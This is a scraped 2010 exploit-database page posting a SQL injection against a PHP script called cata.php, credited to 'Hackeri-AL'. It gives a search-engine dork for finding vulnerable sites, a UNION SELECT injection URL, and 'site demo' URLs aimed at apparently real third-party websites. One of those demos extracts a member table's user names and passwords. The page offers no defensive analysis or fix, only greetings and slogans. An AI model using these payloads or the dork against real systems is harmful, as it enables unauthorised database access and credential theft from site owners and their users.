Home / os / win7

[webapps / 0day] - Cata (cata.php) SQL Injection Vulnerabili

Posted on 30 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Cata (cata.php) SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Cata (cata.php) SQL Injection Vulnerability by Hackeri-AL in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===========================================
Cata (cata.php) SQL Injection Vulnerability
===========================================

[~] Vulnerability found by : Hackeri-AL

########################################################################
       
       Author         	: Hackeri-AL		 	                  
       Contact        	: h-al [at] hotmail [dot] it                         
       Greetz   	: LoocK3D &amp; b4cKd00r ~ &amp; GHoST61 &amp; BaDBoy
                          1337db.com &amp; By_aGReSiF &amp; FurTy &amp; RedGuard
                          cHs &amp; boom3rang &amp; H!tM@N &amp; All Albania Hackers
       My Group         : UAH-Crew = United Albania Hackers /Best Hackers

       Date      : 2010-11-01
       Version   : Cata PHP
       Tested on : Windows XP
       

#########################################################################

[~] DORK: inurl:&quot;cata.php&quot;

----------------------------------------------------------------------------------------------------------------------

[~] Exploit     : http://web.com/cata.php?cat=1+union+select 1,2,3,group_concat(COLUMN,0x3a,COLUMN),5,6,7+from+TABLE-- 

[~] Example     : htpp://web.com/cata.php?cat=1[SQL] &lt; Injected


[~] Site Demo   : http://monalisa.arcadevillage.com/cata.php?cat=1+union+select 1,2,3,group_concat(pseudo,0x3a,pass),5,6,7+from+membre-- 
                
                : http://www.angoltanszek.hu/readingroom/catalogue/cata.php?dw=list&amp;id=-3+union+select+1,@@version,3,4,5--

#########################################################################

[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania

#########################################################################



# <a href='http://1337db.com/'>1337db.com</a> [2010-11-30]</pre></body></html>

 

TOP

Malware :

Exploits :